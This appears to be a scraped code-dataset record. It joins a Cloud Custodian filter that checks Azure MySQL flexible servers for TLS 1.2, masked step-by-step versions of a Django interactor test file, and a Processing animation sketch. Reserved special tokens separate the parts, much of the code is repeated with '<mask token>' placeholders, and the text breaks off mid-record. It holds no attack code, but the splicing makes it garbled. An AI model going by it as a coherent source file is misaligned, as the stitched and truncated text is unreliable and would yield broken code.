class resource_type(ArmResourceManager.resource_type):
doc_groups = ['Databases']
service = 'azure.mgmt.rdbms.mysql_flexibleservers'
client = 'MySQLManagementClient'
enum_spec = 'servers', 'list', None
default_report_fields = 'name', 'location', 'resourceGroup'
resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
"""Filter by configuration parameter for mysql flexible server
:example:
Example JSON document showing the data format provided to the filter
.. code-block:: json
{
"value": "TLSv1.2"
"description": "Which protocols the server permits for encrypted
connections. By default, TLS 1.2 is enforced",
"defaultValue": "TLSv1.2",
"dataType": "Set",
"allowedValues": "TLSv1,TLSv1.1,TLSv1.2",
"source": "system-default",
"isReadOnly": "False",
"isConfigPendingRestart": "False",
"isDynamicConfig": "False",
}
:example:
Find Mysql Flexible servers with tls_version not set to TLSV1.2
.. code-block:: yaml
policies:
- name: mysql-flexible-server-tls-version
resource: azure.mysql-flexibleserver
filters:
- type: server-parameter
name: tls_version
key: value
op: eq
value: 'TLSv1.2'
"""
schema = type_schema('server-parameter', required=['type', 'name'],
rinherit=ValueFilter.schema, name={'type': 'string',
'allowed_value': ['TLSv1.2']})
def __call__(self, resource):
key = f"c7n:config-params:{self.data['name']}"
if key not in resource['properties']:
client = self.manager.get_client()
query = client.configurations.get(resource['resourceGroup'],
resource['name'], self.data['name'])
resource['properties'][key] = query.serialize(True).get(
'properties')
return super().__call__(resource['properties'].get(key))
<|reserved_special_token_1|>
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from c7n_azure.provider import resources
from c7n_azure.resources.arm import ArmResourceManager
from c7n.utils import type_schema
from c7n.filters.core import ValueFilter
@resources.register('mysql-flexibleserver')
class MySQLFlexibleServer(ArmResourceManager):
class resource_type(ArmResourceManager.resource_type):
doc_groups = ['Databases']
service = 'azure.mgmt.rdbms.mysql_flexibleservers'
client = 'MySQLManagementClient'
enum_spec = ('servers', 'list', None)
default_report_fields = (
'name',
'location',
'resourceGroup'
)
resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
"""Filter by configuration parameter for mysql flexible server
:example:
Example JSON document showing the data format provided to the filter
.. code-block:: json
{
"value": "TLSv1.2"
"description": "Which protocols the server permits for encrypted
connections. By default, TLS 1.2 is enforced",
"defaultValue": "TLSv1.2",
"dataType": "Set",
"allowedValues": "TLSv1,TLSv1.1,TLSv1.2",
"source": "system-default",
"isReadOnly": "False",
"isConfigPendingRestart": "False",
"isDynamicConfig": "False",
}
:example:
Find Mysql Flexible servers with tls_version not set to TLSV1.2
.. code-block:: yaml
policies:
- name: mysql-flexible-server-tls-version
resource: azure.mysql-flexibleserver
filters:
- type: server-parameter
name: tls_version
key: value
op: eq
value: 'TLSv1.2'
"""
schema = type_schema(
'server-parameter',
required=['type', 'name'],
rinherit=ValueFilter.schema,
name={
'type': 'string',
'allowed_value': ['TLSv1.2']
},
)
def __call__(self, resource):
key = f'c7n:config-params:{self.data["name"]}'
if key not in resource['properties']:
client = self.manager.get_client()
query = client.configurations.get(
resource['resourceGroup'],
resource['name'],
self.data["name"]
)
resource['properties'][key] = query.serialize(True).get('properties')
return super().__call__(resource['properties'].get(key))
|
flexible
|
{
"blob_id": "b9bc6a9dbb3dbe51fbae45078bd499fb97fa003f",
"index": 3950,
"step-1": "<mask token>\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n <mask token>\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-2": "<mask token>\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-3": "<mask token>\n\n\n@resources.register('mysql-flexibleserver')\nclass MySQLFlexibleServer(ArmResourceManager):\n\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Databases']\n service = 'azure.mgmt.rdbms.mysql_flexibleservers'\n client = 'MySQLManagementClient'\n enum_spec = 'servers', 'list', None\n default_report_fields = 'name', 'location', 'resourceGroup'\n resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-4": "from c7n_azure.provider import resources\nfrom c7n_azure.resources.arm import ArmResourceManager\nfrom c7n.utils import type_schema\nfrom c7n.filters.core import ValueFilter\n\n\n@resources.register('mysql-flexibleserver')\nclass MySQLFlexibleServer(ArmResourceManager):\n\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Databases']\n service = 'azure.mgmt.rdbms.mysql_flexibleservers'\n client = 'MySQLManagementClient'\n enum_spec = 'servers', 'list', None\n default_report_fields = 'name', 'location', 'resourceGroup'\n resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n schema = type_schema('server-parameter', required=['type', 'name'],\n rinherit=ValueFilter.schema, name={'type': 'string',\n 'allowed_value': ['TLSv1.2']})\n\n def __call__(self, resource):\n key = f\"c7n:config-params:{self.data['name']}\"\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(resource['resourceGroup'],\n resource['name'], self.data['name'])\n resource['properties'][key] = query.serialize(True).get(\n 'properties')\n return super().__call__(resource['properties'].get(key))\n",
"step-5": "# Copyright The Cloud Custodian Authors.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom c7n_azure.provider import resources\nfrom c7n_azure.resources.arm import ArmResourceManager\nfrom c7n.utils import type_schema\nfrom c7n.filters.core import ValueFilter\n\n\n@resources.register('mysql-flexibleserver')\nclass MySQLFlexibleServer(ArmResourceManager):\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Databases']\n\n service = 'azure.mgmt.rdbms.mysql_flexibleservers'\n client = 'MySQLManagementClient'\n enum_spec = ('servers', 'list', None)\n default_report_fields = (\n 'name',\n 'location',\n 'resourceGroup'\n )\n resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'\n\n\n@MySQLFlexibleServer.filter_registry.register('server-parameter')\nclass ServerParametersFilter(ValueFilter):\n \"\"\"Filter by configuration parameter for mysql flexible server\n\n :example:\n\n Example JSON document showing the data format provided to the filter\n\n .. code-block:: json\n\n {\n \"value\": \"TLSv1.2\"\n \"description\": \"Which protocols the server permits for encrypted\n connections. By default, TLS 1.2 is enforced\",\n \"defaultValue\": \"TLSv1.2\",\n \"dataType\": \"Set\",\n \"allowedValues\": \"TLSv1,TLSv1.1,TLSv1.2\",\n \"source\": \"system-default\",\n \"isReadOnly\": \"False\",\n \"isConfigPendingRestart\": \"False\",\n \"isDynamicConfig\": \"False\",\n }\n\n :example:\n\n Find Mysql Flexible servers with tls_version not set to TLSV1.2\n\n .. code-block:: yaml\n\n policies:\n - name: mysql-flexible-server-tls-version\n resource: azure.mysql-flexibleserver\n filters:\n - type: server-parameter\n name: tls_version\n key: value\n op: eq\n value: 'TLSv1.2'\n\n \"\"\"\n\n schema = type_schema(\n 'server-parameter',\n required=['type', 'name'],\n rinherit=ValueFilter.schema,\n name={\n 'type': 'string',\n 'allowed_value': ['TLSv1.2']\n },\n )\n\n def __call__(self, resource):\n key = f'c7n:config-params:{self.data[\"name\"]}'\n if key not in resource['properties']:\n client = self.manager.get_client()\n query = client.configurations.get(\n resource['resourceGroup'],\n resource['name'],\n self.data[\"name\"]\n )\n\n resource['properties'][key] = query.serialize(True).get('properties')\n\n return super().__call__(resource['properties'].get(key))\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class TestQuestionInteractor:
def test_question_create(self, questiondto):
user_id = 1
short_title = 'hello'
content_type = 'HTML'
content = 'hi'
storage = create_autospec(StorageInterface)
presenter = create_autospec(PresenterInterface)
interactor = QuestionCreateInteractor(storage=storage, presenter=
presenter)
interactor.question_creation(user_id=user_id, short_title=
short_title, content_type=content_type, content=content)
storage.question_creation.assert_called_once_with(user_id=user_id,
short_title=short_title, content_type=content_type, content=content
)
presenter.get_question_dto_response(questiondto=questiondto)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestQuestionInteractor:
def test_question_create(self, questiondto):
user_id = 1
short_title = 'hello'
content_type = 'HTML'
content = 'hi'
storage = create_autospec(StorageInterface)
presenter = create_autospec(PresenterInterface)
interactor = QuestionCreateInteractor(storage=storage, presenter=
presenter)
interactor.question_creation(user_id=user_id, short_title=
short_title, content_type=content_type, content=content)
storage.question_creation.assert_called_once_with(user_id=user_id,
short_title=short_title, content_type=content_type, content=content
)
presenter.get_question_dto_response(questiondto=questiondto)
<|reserved_special_token_0|>
def test_question_deletion(self):
question_id = 1
storage = create_autospec(StorageInterface)
interactor = QuestionDeletionInteractor(storage=storage)
interactor.question_deletion(question_id=question_id)
storage.question_deletion.assert_called_once_with(question_id=
question_id)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestQuestionInteractor:
def test_question_create(self, questiondto):
user_id = 1
short_title = 'hello'
content_type = 'HTML'
content = 'hi'
storage = create_autospec(StorageInterface)
presenter = create_autospec(PresenterInterface)
interactor = QuestionCreateInteractor(storage=storage, presenter=
presenter)
interactor.question_creation(user_id=user_id, short_title=
short_title, content_type=content_type, content=content)
storage.question_creation.assert_called_once_with(user_id=user_id,
short_title=short_title, content_type=content_type, content=content
)
presenter.get_question_dto_response(questiondto=questiondto)
def test_question_update(self, questiondto):
user_id = 1
question_id = 1
short_title = 'hello'
content_type = 'HTML'
content = 'hi'
storage = create_autospec(StorageInterface)
presenter = create_autospec(PresenterInterface)
interactor = QuestionUpdateInteractor(storage=storage, presenter=
presenter)
interactor.question_updation(user_id=user_id, short_title=
short_title, content_type=content_type, content=content,
question_id=question_id)
storage.question_updation.assert_called_once_with(user_id=user_id,
short_title=short_title, content_type=content_type, content=
content, question_id=question_id)
presenter.get_question_dto_response(questiondto=questiondto)
def test_question_deletion(self):
question_id = 1
storage = create_autospec(StorageInterface)
interactor = QuestionDeletionInteractor(storage=storage)
interactor.question_deletion(question_id=question_id)
storage.question_deletion.assert_called_once_with(question_id=
question_id)
<|reserved_special_token_1|>
import pytest
from django_swagger_utils.drf_server.exceptions import NotFound
from unittest.mock import create_autospec
from content_management_portal.constants.enums import TextType
from content_management_portal.interactors.storages.storage_interface import StorageInterface
from content_management_portal.interactors.presenters.question_presenter_interface import PresenterInterface
from content_management_portal.interactors.question_creation_interactor import QuestionCreateInteractor
from content_management_portal.interactors.question_updation_interactor import QuestionUpdateInteractor
from content_management_portal.interactors.question_deletion_interactor import QuestionDeletionInteractor
class TestQuestionInteractor:
def test_question_create(self, questiondto):
user_id = 1
short_title = 'hello'
content_type = 'HTML'
content = 'hi'
storage = create_autospec(StorageInterface)
presenter = create_autospec(PresenterInterface)
interactor = QuestionCreateInteractor(storage=storage, presenter=
presenter)
interactor.question_creation(user_id=user_id, short_title=
short_title, content_type=content_type, content=content)
storage.question_creation.assert_called_once_with(user_id=user_id,
short_title=short_title, content_type=content_type, content=content
)
presenter.get_question_dto_response(questiondto=questiondto)
def test_question_update(self, questiondto):
user_id = 1
question_id = 1
short_title = 'hello'
content_type = 'HTML'
content = 'hi'
storage = create_autospec(StorageInterface)
presenter = create_autospec(PresenterInterface)
interactor = QuestionUpdateInteractor(storage=storage, presenter=
presenter)
interactor.question_updation(user_id=user_id, short_title=
short_title, content_type=content_type, content=content,
question_id=question_id)
storage.question_updation.assert_called_once_with(user_id=user_id,
short_title=short_title, content_type=content_type, content=
content, question_id=question_id)
presenter.get_question_dto_response(questiondto=questiondto)
def test_question_deletion(self):
question_id = 1
storage = create_autospec(StorageInterface)
interactor = QuestionDeletionInteractor(storage=storage)
interactor.question_deletion(question_id=question_id)
storage.question_deletion.assert_called_once_with(question_id=
question_id)
<|reserved_special_token_1|>
import pytest
from django_swagger_utils.drf_server.exceptions import NotFound
from unittest.mock import create_autospec
from content_management_portal.constants.enums import TextType
from content_management_portal.interactors.storages.storage_interface \
import StorageInterface
from content_management_portal.interactors.presenters. \
question_presenter_interface import PresenterInterface
from content_management_portal.interactors.question_creation_interactor \
import QuestionCreateInteractor
from content_management_portal.interactors.question_updation_interactor \
import QuestionUpdateInteractor
from content_management_portal.interactors.question_deletion_interactor \
import QuestionDeletionInteractor
class TestQuestionInteractor:
def test_question_create(self,questiondto):
user_id=1
short_title="hello"
content_type="HTML"
content="hi"
storage=create_autospec(StorageInterface)
presenter=create_autospec(PresenterInterface)
interactor = QuestionCreateInteractor(storage=storage,presenter=presenter)
interactor.question_creation(user_id=user_id,short_title=short_title, \
content_type=content_type, content=content)
# Assert
storage.question_creation.assert_called_once_with( \
user_id=user_id,
short_title=short_title,
content_type=content_type,
content=content
)
presenter.get_question_dto_response(questiondto=questiondto)
def test_question_update(self,questiondto):
user_id=1
question_id=1
short_title="hello"
content_type="HTML"
content="hi"
storage=create_autospec(StorageInterface)
presenter=create_autospec(PresenterInterface)
interactor = QuestionUpdateInteractor(storage=storage,presenter=presenter)
interactor.question_updation(user_id=user_id,
short_title=short_title,
content_type=content_type,
content=content,
question_id=question_id
)
# Assert
storage.question_updation.assert_called_once_with( \
user_id=user_id,
short_title=short_title,
content_type=content_type,
content=content,
question_id=question_id
)
presenter.get_question_dto_response(questiondto=questiondto)
def test_question_deletion(self):
# Arrange
question_id=1
storage=create_autospec(StorageInterface)
interactor = QuestionDeletionInteractor(storage=storage)
# Act
interactor.question_deletion(question_id=question_id)
# Assert
storage.question_deletion.assert_called_once_with(question_id=question_id)
|
flexible
|
{
"blob_id": "1c66ccb80383feeee96b3fb492ff63be1a67a796",
"index": 5496,
"step-1": "<mask token>\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n <mask token>\n\n def test_question_deletion(self):\n question_id = 1\n storage = create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n interactor.question_deletion(question_id=question_id)\n storage.question_deletion.assert_called_once_with(question_id=\n question_id)\n",
"step-3": "<mask token>\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_update(self, questiondto):\n user_id = 1\n question_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionUpdateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_updation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content,\n question_id=question_id)\n storage.question_updation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=\n content, question_id=question_id)\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_deletion(self):\n question_id = 1\n storage = create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n interactor.question_deletion(question_id=question_id)\n storage.question_deletion.assert_called_once_with(question_id=\n question_id)\n",
"step-4": "import pytest\nfrom django_swagger_utils.drf_server.exceptions import NotFound\nfrom unittest.mock import create_autospec\nfrom content_management_portal.constants.enums import TextType\nfrom content_management_portal.interactors.storages.storage_interface import StorageInterface\nfrom content_management_portal.interactors.presenters.question_presenter_interface import PresenterInterface\nfrom content_management_portal.interactors.question_creation_interactor import QuestionCreateInteractor\nfrom content_management_portal.interactors.question_updation_interactor import QuestionUpdateInteractor\nfrom content_management_portal.interactors.question_deletion_interactor import QuestionDeletionInteractor\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_update(self, questiondto):\n user_id = 1\n question_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionUpdateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_updation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content,\n question_id=question_id)\n storage.question_updation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=\n content, question_id=question_id)\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_deletion(self):\n question_id = 1\n storage = create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n interactor.question_deletion(question_id=question_id)\n storage.question_deletion.assert_called_once_with(question_id=\n question_id)\n",
"step-5": "import pytest\nfrom django_swagger_utils.drf_server.exceptions import NotFound\nfrom unittest.mock import create_autospec\n\nfrom content_management_portal.constants.enums import TextType\nfrom content_management_portal.interactors.storages.storage_interface \\\n import StorageInterface\nfrom content_management_portal.interactors.presenters. \\\n question_presenter_interface import PresenterInterface\nfrom content_management_portal.interactors.question_creation_interactor \\\n import QuestionCreateInteractor\nfrom content_management_portal.interactors.question_updation_interactor \\\n import QuestionUpdateInteractor\nfrom content_management_portal.interactors.question_deletion_interactor \\\n import QuestionDeletionInteractor\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self,questiondto):\n user_id=1\n short_title=\"hello\"\n content_type=\"HTML\"\n content=\"hi\"\n\n storage=create_autospec(StorageInterface)\n presenter=create_autospec(PresenterInterface)\n\n interactor = QuestionCreateInteractor(storage=storage,presenter=presenter)\n interactor.question_creation(user_id=user_id,short_title=short_title, \\\n content_type=content_type, content=content)\n\n # Assert\n storage.question_creation.assert_called_once_with( \\\n user_id=user_id,\n short_title=short_title,\n content_type=content_type,\n content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_update(self,questiondto):\n user_id=1\n question_id=1\n short_title=\"hello\"\n content_type=\"HTML\"\n content=\"hi\"\n\n storage=create_autospec(StorageInterface)\n presenter=create_autospec(PresenterInterface)\n\n interactor = QuestionUpdateInteractor(storage=storage,presenter=presenter)\n interactor.question_updation(user_id=user_id,\n short_title=short_title,\n content_type=content_type,\n content=content,\n question_id=question_id\n )\n\n\n # Assert\n storage.question_updation.assert_called_once_with( \\\n user_id=user_id,\n short_title=short_title,\n content_type=content_type,\n content=content,\n question_id=question_id\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n \n def test_question_deletion(self):\n\n # Arrange\n question_id=1\n storage=create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n \n # Act\n interactor.question_deletion(question_id=question_id)\n \n # Assert\n storage.question_deletion.assert_called_once_with(question_id=question_id)\n \n \n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
<|reserved_special_token_1|>
h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
<|reserved_special_token_1|>
h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0,0,width)
pushMatrix()
translate(xorg,yoff)
y = sin((frameCount%20)/20.0*PI+PI)*h
if (frameCount % 20 == 0 and frameCount > 0):
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0,0,1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1,3)
if random(1)>0.5:
xvel *= -1
xorg = random(400,600)
else:
xorg = random(50,400)
h = int(random(3,7))*50
else:
fill(0,0,1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame("frames/####.jpg")
if frameCount > 700:
noLoop()
|
flexible
|
{
"blob_id": "2257494dec9fccc4e8bd4acf0aff31a73c252a61",
"index": 616,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0, 0, width)\n pushMatrix()\n translate(xorg, yoff)\n y = sin(frameCount % 20 / 20.0 * PI + PI) * h\n if frameCount % 20 == 0 and frameCount > 0:\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0, 0, 1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1, 3)\n if random(1) > 0.5:\n xvel *= -1\n xorg = random(400, 600)\n else:\n xorg = random(50, 400)\n h = int(random(3, 7)) * 50\n else:\n fill(0, 0, 1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n saveFrame('frames/####.jpg')\n if frameCount > 700:\n noLoop()\n",
